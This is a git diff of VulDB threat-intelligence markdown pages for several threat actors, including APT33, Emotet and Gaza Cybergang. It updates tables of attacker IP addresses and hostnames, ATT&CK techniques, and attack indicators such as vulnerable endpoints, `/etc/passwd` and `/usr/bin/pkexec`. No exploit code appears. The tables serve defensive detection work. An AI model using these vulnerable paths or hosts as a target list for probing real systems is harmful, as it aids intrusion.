Update
This commit is contained in:
parent
0c11dcfc85
commit
22f05d0892
|
@ -57,7 +57,7 @@ ID | IP address | Hostname | Confidence
|
|||
23 | 46.148.17.227 | - | High
|
||||
24 | 46.166.162.90 | - | High
|
||||
25 | 46.183.217.74 | ip-217-74.dataclub.info | High
|
||||
26 | 51.38.128.110 | - | High
|
||||
26 | 51.38.128.110 | vps-b7b05fc8.vps.ovh.net | High
|
||||
27 | 51.254.76.54 | - | High
|
||||
28 | 51.254.158.57 | - | High
|
||||
29 | 54.37.104.106 | piber.connectedlists.com | High
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# APT33 - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [APT33](https://vuldb.com/?actor.apt33). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [APT33](https://vuldb.com/?actor.apt33). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.apt33](https://vuldb.com/?actor.apt33)
|
||||
|
||||
|
@ -16,12 +16,12 @@ The following campaigns are known and can be associated with APT33:
|
|||
|
||||
These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with APT33:
|
||||
|
||||
* SV
|
||||
* FR
|
||||
* DE
|
||||
* ES
|
||||
* PL
|
||||
* ...
|
||||
|
||||
There are 18 more country items available. Please use our online service to access the data.
|
||||
There are 4 more country items available. Please use our online service to access the data.
|
||||
|
||||
## IOC - Indicator of Compromise
|
||||
|
||||
|
@ -44,14 +44,9 @@ ID | IP address | Hostname | Confidence
|
|||
13 | 8.26.21.223 | mail5.boldinbox.com | High
|
||||
14 | 31.7.62.48 | - | High
|
||||
15 | 37.48.105.178 | - | High
|
||||
16 | 45.32.186.33 | 45.32.186.33.vultr.com | Medium
|
||||
17 | 45.76.32.252 | 45.76.32.252.vultr.com | Medium
|
||||
18 | 51.77.11.46 | ip46.ip-51-77-11.eu | High
|
||||
19 | 51.254.71.223 | ip223.ip-51-254-71.eu | High
|
||||
20 | 54.36.73.108 | mail.snap-status.com | High
|
||||
21 | ... | ... | ...
|
||||
16 | ... | ... | ...
|
||||
|
||||
There are 55 more IOC items available. Please use our online service to access the data.
|
||||
There are 60 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
@ -59,14 +54,12 @@ Tactics, techniques, and procedures summarize the suspected ATT&CK techniques us
|
|||
|
||||
ID | Technique | Description | Confidence
|
||||
-- | --------- | ----------- | ----------
|
||||
1 | T1008 | Algorithm Downgrade | High
|
||||
2 | T1040 | Authentication Bypass by Capture-replay | High
|
||||
3 | T1059.007 | Cross Site Scripting | High
|
||||
4 | T1068 | Execution with Unnecessary Privileges | High
|
||||
5 | T1110.001 | Improper Restriction of Excessive Authentication Attempts | High
|
||||
6 | ... | ... | ...
|
||||
1 | T1059.007 | Cross Site Scripting | High
|
||||
2 | T1068 | Execution with Unnecessary Privileges | High
|
||||
3 | T1110.001 | Improper Restriction of Excessive Authentication Attempts | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 11 more TTP items available. Please use our online service to access the data.
|
||||
There are 8 more TTP items available. Please use our online service to access the data.
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
|
@ -74,19 +67,32 @@ These indicators of attack list the potential fragments used for technical activ
|
|||
|
||||
ID | Type | Indicator | Confidence
|
||||
-- | ---- | --------- | ----------
|
||||
1 | File | `$SPLUNK_HOME/etc/splunk-launch.conf` | High
|
||||
2 | File | `%PROGRAMDATA%\1E\Client` | High
|
||||
3 | File | `%PROGRAMDATA%\ASUS\GamingCenterLib` | High
|
||||
4 | File | `%PROGRAMDATA%\WrData\PKG` | High
|
||||
5 | File | `%PROGRAMFILES(X86)%/Aternity Information Systems/Assistant/plugins` | High
|
||||
6 | File | `.folder` | Low
|
||||
7 | File | `.forward` | Medium
|
||||
8 | File | `.git/hooks/post-update` | High
|
||||
9 | File | `.gitlab-ci.yml` | High
|
||||
10 | File | `.htaccess` | Medium
|
||||
11 | ... | ... | ...
|
||||
1 | File | `/admin/upload.php` | High
|
||||
2 | File | `/api/ZRMesh/set_ZRMesh` | High
|
||||
3 | File | `/appliance/shiftmgn.php` | High
|
||||
4 | File | `/damicms-master/admin.php?s=/Article/doedit` | High
|
||||
5 | File | `/etc/quagga` | Medium
|
||||
6 | File | `/fw/index2.do` | High
|
||||
7 | File | `/jerry-core/ecma/base/ecma-lcache.c` | High
|
||||
8 | File | `/jerry-core/ecma/base/ecma-literal-storage.c` | High
|
||||
9 | File | `/jerry-core/jmem/jmem-heap.c` | High
|
||||
10 | File | `/moddable/xs/sources/xsScript.c` | High
|
||||
11 | File | `/parser/js/js-parser-expr.c` | High
|
||||
12 | File | `/preferences/tags` | High
|
||||
13 | File | `/thruk/#cgi-bin/extinfo.cgi?type=2` | High
|
||||
14 | File | `/thruk/#cgi-bin/status.cgi?style=combined` | High
|
||||
15 | File | `/transmission/web/` | High
|
||||
16 | File | `/uploads/exam_question/` | High
|
||||
17 | File | `/usr/bin/pkexec` | High
|
||||
18 | File | `AccessPoint.java` | High
|
||||
19 | File | `acknow.php` | Medium
|
||||
20 | File | `acropora/app/identity/ic.c` | High
|
||||
21 | File | `acropora/app/identity/identity_support.c` | High
|
||||
22 | File | `actions.php` | Medium
|
||||
23 | File | `admin/bad.php` | High
|
||||
24 | ... | ... | ...
|
||||
|
||||
There are 4716 more IOA items available. Please use our online service to access the data.
|
||||
There are 199 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -103,9 +109,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -92,7 +92,8 @@ ID | Type | Indicator | Confidence
|
|||
32 | File | `admin/index.php` | High
|
||||
33 | File | `admin/index.php?n=ui_set&m=admin&c=index&a=doget_text_content&table=lang&field=1` | High
|
||||
34 | File | `admin/system_manage/save.html` | High
|
||||
35 | ... | ... | ...
|
||||
35 | File | `ajax.php` | Medium
|
||||
36 | ... | ... | ...
|
||||
|
||||
There are 304 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# BelialDemon - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [BelialDemon](https://vuldb.com/?actor.belialdemon). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [BelialDemon](https://vuldb.com/?actor.belialdemon). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.belialdemon](https://vuldb.com/?actor.belialdemon)
|
||||
|
||||
|
@ -46,8 +46,9 @@ These indicators of attack list the potential fragments used for technical activ
|
|||
|
||||
ID | Type | Indicator | Confidence
|
||||
-- | ---- | --------- | ----------
|
||||
1 | File | `include/ajax.draft.php` | High
|
||||
2 | Argument | `request` | Low
|
||||
1 | File | `AdminBaseController.class.php` | High
|
||||
2 | File | `include/ajax.draft.php` | High
|
||||
3 | Argument | `request` | Low
|
||||
|
||||
## References
|
||||
|
||||
|
@ -59,9 +60,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -97,7 +97,7 @@ ID | Type | Indicator | Confidence
|
|||
30 | File | `ActiveServices.java` | High
|
||||
31 | ... | ... | ...
|
||||
|
||||
There are 260 more IOA items available. Please use our online service to access the data.
|
||||
There are 262 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# DeathClick - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [DeathClick](https://vuldb.com/?actor.deathclick). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [DeathClick](https://vuldb.com/?actor.deathclick). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.deathclick](https://vuldb.com/?actor.deathclick)
|
||||
|
||||
|
@ -28,9 +28,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Desert Falcons - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Desert Falcons](https://vuldb.com/?actor.desert_falcons). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Desert Falcons](https://vuldb.com/?actor.desert_falcons). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.desert_falcons](https://vuldb.com/?actor.desert_falcons)
|
||||
|
||||
|
@ -37,10 +37,9 @@ ID | Type | Indicator | Confidence
|
|||
1 | File | `ftpcmd.c` | Medium
|
||||
2 | File | `kernel/events/core.c` | High
|
||||
3 | File | `PresentSpace.jsp` | High
|
||||
4 | File | `staff/register.php` | High
|
||||
5 | Argument | `ConnPoolName/GroupId` | High
|
||||
6 | Argument | `cpfr/cpto` | Medium
|
||||
7 | Argument | `First Name/Last Name` | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 4 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -52,9 +51,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -9,11 +9,11 @@ Live data and more analysis capabilities are available at [https://vuldb.com/?ac
|
|||
These countries are directly (e.g. origin of attacks) or indirectly (e.g. access by proxy) associated with Emotet:
|
||||
|
||||
* VN
|
||||
* CN
|
||||
* US
|
||||
* CN
|
||||
* ...
|
||||
|
||||
There are 5 more country items available. Please use our online service to access the data.
|
||||
There are 7 more country items available. Please use our online service to access the data.
|
||||
|
||||
## IOC - Indicator of Compromise
|
||||
|
||||
|
@ -36,7 +36,7 @@ ID | IP address | Hostname | Confidence
|
|||
13 | 5.89.33.136 | net-5-89-33-136.cust.vodafonedsl.it | High
|
||||
14 | 5.196.35.138 | vps10.open-techno.net | High
|
||||
15 | 5.230.193.41 | casagarcia-web.sys.netzfabrik.eu | High
|
||||
16 | 8.4.9.137 | host-8-4-9-137.onlinehorizons.net | High
|
||||
16 | 8.4.9.137 | onlinehorizons.net | High
|
||||
17 | 12.32.68.154 | mail.sealscoinc.com | High
|
||||
18 | 12.149.72.170 | - | High
|
||||
19 | 12.162.84.2 | - | High
|
||||
|
@ -141,7 +141,7 @@ ID | Technique | Description | Confidence
|
|||
3 | T1110.001 | Improper Restriction of Excessive Authentication Attempts | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 9 more TTP items available. Please use our online service to access the data.
|
||||
There are 8 more TTP items available. Please use our online service to access the data.
|
||||
|
||||
## IOA - Indicator of Attack
|
||||
|
||||
|
@ -149,28 +149,28 @@ These indicators of attack list the potential fragments used for technical activ
|
|||
|
||||
ID | Type | Indicator | Confidence
|
||||
-- | ---- | --------- | ----------
|
||||
1 | File | `./clients/client` | High
|
||||
2 | File | `/?ajax-request=jnews` | High
|
||||
3 | File | `/assets/ctx` | Medium
|
||||
4 | File | `/config/getuser` | High
|
||||
1 | File | `/?ajax-request=jnews` | High
|
||||
2 | File | `/ajax_crud` | Medium
|
||||
3 | File | `/appliance/users?action=edit` | High
|
||||
4 | File | `/assets/ctx` | Medium
|
||||
5 | File | `/core/table/query` | High
|
||||
6 | File | `/dev/ion` | Medium
|
||||
7 | File | `/ecma/operations/ecma-objects.c` | High
|
||||
8 | File | `/enduserreg` | Medium
|
||||
9 | File | `/forum/away.php` | High
|
||||
10 | File | `/GetCopiedFile` | High
|
||||
11 | File | `/goform/activate_process` | High
|
||||
12 | File | `/hdf5/src/H5T.c` | High
|
||||
8 | File | `/forum/away.php` | High
|
||||
9 | File | `/GetCopiedFile` | High
|
||||
10 | File | `/goform/activate_process` | High
|
||||
11 | File | `/hdf5/src/H5T.c` | High
|
||||
12 | File | `/include/chart_generator.php` | High
|
||||
13 | File | `/jerry-core/ecma/base/ecma-gc.c` | High
|
||||
14 | File | `/jerry-core/ecma/base/ecma-helpers-conversion.c` | High
|
||||
15 | File | `/jerry-core/ecma/base/ecma-lcache.c` | High
|
||||
16 | File | `/jerry-core/ecma/operations/ecma-objects.c` | High
|
||||
17 | File | `/jerry-core/vm/vm.c` | High
|
||||
18 | File | `/mobile/SelectUsers.jsp` | High
|
||||
19 | File | `/ms/mdiy/model/importJson.do` | High
|
||||
18 | File | `/ms/mdiy/model/importJson.do` | High
|
||||
19 | File | `/ms/template/writeFileContent.do` | High
|
||||
20 | ... | ... | ...
|
||||
|
||||
There are 166 more IOA items available. Please use our online service to access the data.
|
||||
There are 167 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# EvilBunny - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [EvilBunny](https://vuldb.com/?actor.evilbunny). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [EvilBunny](https://vuldb.com/?actor.evilbunny). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.evilbunny](https://vuldb.com/?actor.evilbunny)
|
||||
|
||||
|
@ -25,12 +25,9 @@ ID | IP address | Hostname | Confidence
|
|||
2 | 8.5.1.34 | - | High
|
||||
3 | 64.15.136.137 | - | High
|
||||
4 | 66.45.225.11 | - | High
|
||||
5 | 67.19.22.234 | ip1.brainstemprojects.com | High
|
||||
6 | 67.19.84.46 | 2e.54.1343.static.theplanet.com | High
|
||||
7 | 68.178.232.99 | parkwebwin-v02.prod.mesa1.secureserver.net | High
|
||||
8 | ... | ... | ...
|
||||
5 | ... | ... | ...
|
||||
|
||||
There are 13 more IOC items available. Please use our online service to access the data.
|
||||
There are 16 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
@ -56,14 +53,9 @@ ID | Type | Indicator | Confidence
|
|||
3 | File | `/etc/passwd` | Medium
|
||||
4 | File | `/getcfg.php` | Medium
|
||||
5 | File | `forumrunner/includes/moderation.php` | High
|
||||
6 | File | `fs/inode.c` | Medium
|
||||
7 | File | `includes/class.rest-api.php` | High
|
||||
8 | File | `index.cgi` | Medium
|
||||
9 | File | `index.php` | Medium
|
||||
10 | File | `libavcodec/gif.c` | High
|
||||
11 | ... | ... | ...
|
||||
6 | ... | ... | ...
|
||||
|
||||
There are 31 more IOA items available. Please use our online service to access the data.
|
||||
There are 38 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -75,9 +67,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
(c) [1997-2022](https://vuldb.com/?kb.changelog) by [vuldb.com](https://vuldb.com/?kb.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?kb.faq), read the [documentation](https://vuldb.com/?kb) or [contact us](https://vuldb.com/?contact)!
|
||||
|
|
|
@ -20,7 +20,7 @@ These countries are directly (e.g. origin of attacks) or indirectly (e.g. access
|
|||
* FR
|
||||
* ...
|
||||
|
||||
There are 27 more country items available. Please use our online service to access the data.
|
||||
There are 28 more country items available. Please use our online service to access the data.
|
||||
|
||||
## IOC - Indicator of Compromise
|
||||
|
||||
|
@ -37,7 +37,7 @@ ID | IP address | Hostname | Confidence
|
|||
7 | 5.61.32.118 | - | High
|
||||
8 | 5.61.38.52 | - | High
|
||||
9 | 5.135.73.113 | - | High
|
||||
10 | 5.149.250.235 | snigist.co.uk | High
|
||||
10 | 5.149.250.235 | quoll.tellfex.com | High
|
||||
11 | 5.149.250.241 | flipveranda.co.uk | High
|
||||
12 | 5.149.252.144 | - | High
|
||||
13 | 5.149.253.126 | - | High
|
||||
|
@ -116,33 +116,33 @@ ID | Type | Indicator | Confidence
|
|||
20 | File | `/tmp` | Low
|
||||
21 | File | `/type.php` | Medium
|
||||
22 | File | `/uncpath/` | Medium
|
||||
23 | File | `/wp-json/wc/v3/webhooks` | High
|
||||
24 | File | `4.2.0.CP09` | Medium
|
||||
25 | File | `14all.cgi/14all-1.1.cgi/traffic.cgi/mrtg.cgi` | High
|
||||
26 | File | `actions/CompanyDetailsSave.php` | High
|
||||
27 | File | `ActiveServices.java` | High
|
||||
28 | File | `admin.color.php` | High
|
||||
29 | File | `admin.cropcanvas.php` | High
|
||||
30 | File | `admin.joomlaradiov5.php` | High
|
||||
31 | File | `admin.php` | Medium
|
||||
32 | File | `admin/?n=user&c=admin_user&a=doGetUserInfo` | High
|
||||
33 | File | `admin/add-glossary.php` | High
|
||||
34 | File | `admin/conf_users_edit.php` | High
|
||||
35 | File | `admin/edit-comments.php` | High
|
||||
36 | File | `admin/src/containers/InputModalStepperProvider/index.js` | High
|
||||
37 | File | `admin/write-post.php` | High
|
||||
38 | File | `administrator/components/com_media/helpers/media.php` | High
|
||||
39 | File | `admin_events.php` | High
|
||||
40 | File | `AjaxApplication.java` | High
|
||||
41 | File | `akocomments.php` | High
|
||||
42 | File | `allopass-error.php` | High
|
||||
43 | File | `AllowBindAppWidgetActivity.java` | High
|
||||
44 | File | `AndroidManifest.xml` | High
|
||||
45 | File | `AnnotateActivity.java` | High
|
||||
46 | File | `announcement.php` | High
|
||||
23 | File | `/usr/bin/pkexec` | High
|
||||
24 | File | `/wp-json/wc/v3/webhooks` | High
|
||||
25 | File | `4.2.0.CP09` | Medium
|
||||
26 | File | `14all.cgi/14all-1.1.cgi/traffic.cgi/mrtg.cgi` | High
|
||||
27 | File | `actions/CompanyDetailsSave.php` | High
|
||||
28 | File | `ActiveServices.java` | High
|
||||
29 | File | `admin.color.php` | High
|
||||
30 | File | `admin.cropcanvas.php` | High
|
||||
31 | File | `admin.joomlaradiov5.php` | High
|
||||
32 | File | `admin.php` | Medium
|
||||
33 | File | `admin/?n=user&c=admin_user&a=doGetUserInfo` | High
|
||||
34 | File | `admin/add-glossary.php` | High
|
||||
35 | File | `admin/conf_users_edit.php` | High
|
||||
36 | File | `admin/edit-comments.php` | High
|
||||
37 | File | `admin/src/containers/InputModalStepperProvider/index.js` | High
|
||||
38 | File | `admin/write-post.php` | High
|
||||
39 | File | `administrator/components/com_media/helpers/media.php` | High
|
||||
40 | File | `admin_events.php` | High
|
||||
41 | File | `AjaxApplication.java` | High
|
||||
42 | File | `akocomments.php` | High
|
||||
43 | File | `allopass-error.php` | High
|
||||
44 | File | `AllowBindAppWidgetActivity.java` | High
|
||||
45 | File | `AndroidManifest.xml` | High
|
||||
46 | File | `AnnotateActivity.java` | High
|
||||
47 | ... | ... | ...
|
||||
|
||||
There are 404 more IOA items available. Please use our online service to access the data.
|
||||
There are 406 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Gaza Cybergang - Cyber Threat Intelligence
|
||||
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?doc.cti) of the actor known as [Gaza Cybergang](https://vuldb.com/?actor.gaza_cybergang). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
The indicators are related to [VulDB CTI analysis](https://vuldb.com/?kb.cti) of the actor known as [Gaza Cybergang](https://vuldb.com/?actor.gaza_cybergang). The activity monitoring correlates data from social media, forums, chat rooms, and darknet markets. It helps to determine associated actors, activities, intentions, emerging research, and attacks. Our unique predictive model is able to forecast activities and their characteristics.
|
||||
|
||||
Live data and more analysis capabilities are available at [https://vuldb.com/?actor.gaza_cybergang](https://vuldb.com/?actor.gaza_cybergang)
|
||||
|
||||
|
@ -28,12 +28,11 @@ These indicators of compromise indicate associated network ressources which are
|
|||
ID | IP address | Hostname | Confidence
|
||||
-- | ---------- | -------- | ----------
|
||||
1 | 45.63.97.44 | 45.63.97.44.vultr.com | Medium
|
||||
2 | 82.211.30.186 | cud3.newyparkingspaces.com | High
|
||||
3 | 82.211.30.192 | cud9.newyparkingspaces.com | High
|
||||
4 | 82.211.30.212 | cud29.newyparkingspaces.com | High
|
||||
5 | ... | ... | ...
|
||||
2 | 82.211.30.186 | - | High
|
||||
3 | 82.211.30.192 | - | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 6 more IOC items available. Please use our online service to access the data.
|
||||
There are 7 more IOC items available. Please use our online service to access the data.
|
||||
|
||||
## TTP - Tactics, Techniques, Procedures
|
||||
|
||||
|
@ -54,19 +53,12 @@ These indicators of attack list the potential fragments used for technical activ
|
|||
|
||||
ID | Type | Indicator | Confidence
|
||||
-- | ---- | --------- | ----------
|
||||
1 | File | `api_poller.php` | High
|
||||
2 | File | `crossdomain.xml` | High
|
||||
3 | File | `diy/module/member/controllers/Api.php` | High
|
||||
4 | File | `Forms/tools_admin_1` | High
|
||||
5 | File | `install/page_dbsettings.php` | High
|
||||
6 | File | `register/check/username?username` | High
|
||||
7 | File | `rzpnk.sys` | Medium
|
||||
8 | File | `wp-includes/class-wp-query.php` | High
|
||||
9 | Library | `C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_4592475aca2acf83\Amd64\printconfig.dll` | High
|
||||
10 | Library | `mshtml.dll` | Medium
|
||||
11 | ... | ... | ...
|
||||
1 | File | `/index.php/newsletter/subscriber/new/` | High
|
||||
2 | File | `api_poller.php` | High
|
||||
3 | File | `crossdomain.xml` | High
|
||||
4 | ... | ... | ...
|
||||
|
||||
There are 6 more IOA items available. Please use our online service to access the data.
|
||||
There are 14 more IOA items available. Please use our online service to access the data.
|
||||
|
||||
## References
|
||||
|
||||
|
@ -79,9 +71,9 @@ The following list contains external sources which discuss the actor and the ass
|
|||
|
||||
The following articles explain our unique predictive cyber threat intelligence:
|
||||
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?doc.cti)
|
||||
* [VulDB Cyber Threat Intelligence Documentation](https://vuldb.com/?kb.cti)
|
||||
* [Cyber Threat Intelligence - Early Anticipation of Attacks](https://www.scip.ch/en/?labs.20201022)
|
||||
|
||||
## License
|
||||
|
||||
(c) [1997-2021](https://vuldb.com/?doc.changelog) by [vuldb.com](https://vuldb.com/?doc.about). All data on this page is shared under the license [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0/). Questions? Check the [FAQ](https://vuldb.com/?doc.faq), read the [documentation](https://vuldb.com/?doc) or [contact us](https://vuldb.com/?contact)!
|
||||
